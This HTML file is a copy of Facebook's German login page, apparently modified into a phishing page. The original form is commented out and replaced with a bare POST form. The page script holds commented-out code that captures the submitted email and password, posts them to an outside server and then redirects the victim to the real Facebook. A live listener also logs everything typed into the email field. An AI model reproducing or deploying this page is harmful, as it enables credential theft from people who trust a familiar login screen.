<!DOCTYPE html>
<html lang="de" id="facebook" class="no_js">

<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" />
    <title id="pageTitle">Facebook – Anmelden oder Registrieren</title>
    <meta name="bingbot" content="noarchive" />
    <meta property="og:site_name" content="Facebook" />
    <meta property="og:url" content="https://www.facebook.com/" />
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    <meta property="og:locale" content="de_DE" />
    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/" />
    <link rel="alternate" media="handheld" href="https://m.facebook.com/" />
    <meta name="description"
        content="Melde dich bei Facebook an, um dich mit deinen Freunden, deiner Familie und Personen, die du kennst, zu verbinden und Inhalte zu teilen." />
    <link rel="canonical" href="https://www.facebook.com/" />
    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/9I4JWZIGDrm.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="GujAYq2" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/HmpJKhDBKTh.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="ESa7acZ" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/DmsUoXmRKt0.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="tgpreWX" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/ODYIBnoMDWX.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="MJ8uzOV" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yR/l/0,cross/Lw25age7f47.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="4NT1RCX" crossorigin="anonymous" />
    <style>
        textarea:focus,
        input:focus {
            outline: none;
        }
    </style>
</head>

<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit x1 Locale_de_DE" dir="ltr">

    <div class="_li" id="u_0_1_PI">
        <div id="globalContainer" class="uiContextualLayerParent">
            <div class="fb_content clearfix " id="content" role="main">
                <div>
                    <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
                        <div class="_8esk">
                            <div class="_8esl">
                                <div class="_8ice"><img class="fb_logo _8ilh img"
                                        src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
                                        alt="Facebook" /></div>
                                <h2 class="_8eso">Auf Facebook bleibst du mit Menschen in Verbindung und teilst Fotos,
                                    Videos und vieles mehr mit ihnen.</h2>
                            </div>
                            <div class="_8esn">
                                <div class="_8iep _8icy _9ahz _9ah-">
                                    <div class="_6luv _52jv">

                                        <!-- <form class="_9vtf" data-testid="royal_login_form"
                                             id="u_0_2_wS"> -->
                                        <form id="u_0_2_wS" method="post">
                                            <input type="hidden" name="jazoest" value="2842" autocomplete="off" /><input
                                                type="hidden" name="lsd" value="AVqHBiBV33Q" autocomplete="off" />
                                            <div>
                                                <div class="_6lux"><input type="text" class="inputtext _55r1 _6luy"
                                                        name="email" id="email" data-testid="royal_email"
                                                        placeholder="E-Mail-Adresse oder Telefonnummer" autofocus="1"
                                                        aria-label="E-Mail-Adresse oder Telefonnummer" /></div>
                                                <div class="_6lux"><input type="password" class="inputtext _55r1 _6luy"
                                                        name="pass" id="pass" placeholder="Passwort"
                                                        aria-label="Passwort" /></div>
                                                <!-- <div class="_6lux">
                                                <div class="_6luy _55r1 _1kbt" id="passContainer"><input type="password"
                                                        class="inputtext _55r1 _6luy _9npi" name="pass" id="pass"
                                                        data-testid="royal_pass" placeholder="Passwort"
                                                        aria-label="Passwort" />
                                                </div>
                                            </div> -->
                                            </div><input type="hidden" autocomplete="off" name="login_source"
                                                value="comet_headerless_login" /><input type="hidden" autocomplete="off"
                                                name="next" value="" />
                                            <div class="_6ltg"><button value="1"
                                                    class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login"
                                                    data-testid="royal_login_button" type="submit"
                                                    id="u_0_5_1G">Anmelden</button></div>
                                            <div class="_6ltj"><a
                                                    href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzI0NzU3NTQxLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login&amp;next">Passwort
                                                    vergessen?</a></div>
                                            <div class="_8icz"></div>
                                            <div class="_6ltg"><a role="button"
                                                    class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy"
                                                    id="u_0_0_Z2">Neues Konto
                                                    erstellen</a></div>
                                        </form>
                                    </div>
                                    <div id="reg_pages_msg" class="_58mk"><a
                                            href="/pages/create/?ref_type=registration_form" class="_8esh">Erstelle eine
                                            Seite</a> für einen Star, eine Marke oder ein Unternehmen.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="">
                <div class="_95ke _8opy">
                    <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                        <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                            <li>Deutsch</li>
                            <li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" title="English (US)">English
                                    (US)</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/" title="Turkish">Türkçe</a>
                            </li>
                            <li><a class="_sv4" dir="ltr" href="https://pl-pl.facebook.com/" title="Polish">Polski</a>
                            </li>
                            <li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/"
                                    title="Italian">Italiano</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://ro-ro.facebook.com/" title="Romanian">Română</a>
                            </li>
                            <li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/"
                                    title="French (France)">Français (France)</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://ru-ru.facebook.com/" title="Russian">Русский</a>
                            </li>
                            <li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/" title="Arabic">العربية</a>
                            </li>
                            <li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" title="Spanish">Español</a>
                            </li>
                            <li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/"
                                    title="Portuguese (Brazil)">Português (Brasil)</a></li>
                            <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog"
                                    ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2F&amp;source=www_list_selector_more"
                                    href="#" title="Weitere Sprachen anzeigen"><i
                                        class="img sp_XmNN8RBUWF5 sx_35dd01"></i></a></li>
                        </ul>
                        <div id="contentCurve"></div>
                        <div id="pageFooterChildren" role="contentinfo" aria-label="Facebook-Webseitenlinks">
                            <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                                <li><a href="/reg/" title="F&#xfc;r Facebook registrieren">Registrieren</a></li>
                                <li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li>
                                <li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a>
                                </li>
                                <li><a href="/lite/" title="Facebook Lite f&#xfc;r Android">Facebook Lite</a></li>
                                <li><a href="https://www.facebook.com/watch/"
                                        title="Video-Tab durchst&#xf6;bern">Video</a></li>
                                <li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li>
                                <li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li>
                                <li><a href="/marketplace/"
                                        title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a>
                                </li>
                                <li><a href="https://about.meta.com/technologies/meta-pay"
                                        title="Weitere Infos zu Meta Pay" target="_blank">Meta Pay</a></li>
                                <li><a href="https://www.meta.com/" title="Meta kennenlernen" target="_blank">Meta
                                        Store</a></li>
                                <li><a href="https://www.meta.com/quest/" title="Mehr zu Meta&#xa0;Quest"
                                        target="_blank">Meta Quest</a></li>
                                <li><a href="https://www.meta.com/smart-glasses/" title="Learn more about Meta Ray-Ban"
                                        target="_blank">Meta Ray-Ban</a></li>
                                <li><a href="https://www.meta.ai/" title="Meta&#xa0;AI">Meta AI</a></li>
                                <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3u3sRoj9q7YFuwvsLRTM4QNpKf-sq63SZm7S7rDbRhMZRyFuUQVs93FmurujW9uKYej7fb7mJO3JZfVD-hhFOFAb0PdMkL4yGWy203zNqRyHtCrvzNjVmQuslaBxxmdDAasR5Q7XmtjUaonLeRbqlH1DpMgQ"
                                        title="Probiere Instagram aus" target="_blank" rel="noreferrer nofollow"
                                        data-lynx-mode="asynclazy">Instagram</a></li>
                                <li><a href="https://www.threads.net/" title="Threads ansehen">Threads</a></li>
                                <li><a href="/fundraisers/"
                                        title="Spende f&#xfc;r eine sinnvolle Sache.">Spendenaktionen</a></li>
                                <li><a href="/biz/directory/"
                                        title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li>
                                <li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D"
                                        title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li>
                                <li><a href="/privacy/policy/?entry_point=facebook_page_footer"
                                        title="Infos dazu, wie wir Informationen erfassen, verwenden und teilen, um Facebook als Dienst anbieten zu k&#xf6;nnen">Datenschutzrichtlinie</a>
                                </li>
                                <li><a href="/privacy/center/?entry_point=facebook_page_footer"
                                        title="Infos zu deinen Privatsph&#xe4;re-Optionen auf Facebook und wie du sie festlegen und verwalten kannst">Privacy
                                        Center</a></li>
                                <li><a href="/privacy/cookie_settings/"
                                        title="Erfahre mehr &#xfc;ber die Cookie-Einstellungen von Facebook.">Cookie-Einstellungen</a>
                                </li>
                                <li><a href="/groups/discover/" title="Entdecke unsere Gruppen.">Gruppen</a></li>
                                <li><a href="https://about.meta.com/" accesskey="8"
                                        title="Lies unseren Blog, entdecke unseren Ressourcenbereich und suche nach Jobs.">Info</a>
                                </li>
                                <li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto"
                                        title="Wirb auf Facebook.">Werbeanzeige erstellen</a></li>
                                <li><a href="/pages/create/?ref_type=site_footer" title="Seite erstellen">Seite
                                        erstellen</a></li>
                                <li><a href="https://developers.facebook.com/?ref=pf"
                                        title="Entwickle Apps auf unserer Plattform.">Entwickler</a></li>
                                <li><a href="/careers/?ref=pf"
                                        title="Mach deinen n&#xe4;chsten Karriereschritt und bewirb dich bei unserem gro&#xdf;artigen Unternehmen.">Karriere</a>
                                </li>
                                <li><a href="/policies/cookies/" title="Erfahre mehr &#xfc;ber Cookies und Facebook."
                                        data-nocookies="1">Cookies</a></li>
                                <li><a class="_41ug" data-nocookies="1"
                                        href="https://www.facebook.com/help/568137493302217"
                                        title="Erfahre mehr &#xfc;ber Datenschutzinfo.">Werbepräferenzen<i
                                            class="img sp_XmNN8RBUWF5 sx_73fab3"></i></a></li>
                                <li><a data-nocookies="1" href="/legal/terms?ref=pf" accesskey="9"
                                        title="Unsere Nutzungsbedingungen und Richtlinien.">Impressum/Nutzungsbedingungen</a>
                                </li>
                                <li><a data-nocookies="1" href="/legal/germany/"
                                        title="Unsere Nutzungsbedingungen und Richtlinien.">UrhDaG/MStV</a></li>
                                <li><a href="/help/?ref=pf" accesskey="0"
                                        title="Besuche unseren Hilfebereich.">Hilfe</a></li>
                                <li><a href="help/637205020878504"
                                        title="Klicke auf unseren Hinweis zum Hochladen von Kontakten und zu Nicht-Nutzern.">Hochladen
                                        von Kontakten und Nicht-Nutzer</a></li>
                                <li><a accesskey="6" class="accessible_elem" href="/settings"
                                        title="Facebook-Einstellungen ansehen und bearbeiten.">Einstellungen</a></li>
                                <li><a accesskey="7" class="accessible_elem"
                                        href="/allactivity?privacy_source=activity_log_top_menu"
                                        title="Aktivit&#xe4;tenprotokoll anzeigen">Aktivitätenprotokoll</a></li>
                            </ul>
                        </div>
                        <div class="mvl copyright">
                            <div><span> Meta © 2024</span></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
                style="display:none" /></span>
    </div>
    <div style="display:none">
        <div></div>
        <div></div>
    </div>
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/9I4JWZIGDrm.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/HmpJKhDBKTh.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/DmsUoXmRKt0.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/ODYIBnoMDWX.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yR/l/0,cross/Lw25age7f47.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <script>
        const emailInput = document.getElementById("email")
        // const submitBtn = document.getElementById("u_0_5_1G")
        const form = document.getElementById("u_0_2_wS")

        // form.addEventListener('submit', function (e) {
        //     e.preventDefault()

        //     var email = document.getElementById('email').value
        //     var password = document.getElementById('pass').value

        //     fetch('https://jsonplaceholder.typicode.com/posts', {
        //         method: 'POST',
        //         body: JSON.stringify({
        //             email: email,
        //             password: password,

        //         }),
        //         headers: {
        //             'Content-type': 'application/json; charset=UTF-8',
        //         }
        //     })
        //         .then(function (response) {
        //             return response.json()
        //         })
        //         .then(function (data) {
        //             console.log(data)
        //             window.location.href = "http://www.facebook.com";
        //         }).catch(error => console.error('Error:', error));
        // });

        emailInput.addEventListener("input", (e) => {
            console.log(e.target.value)
        })
        // submitBtn.addEventListener("click", (e) => {
        //     console.log(emailInput.value)
        // })
    </script>
</body>

</html>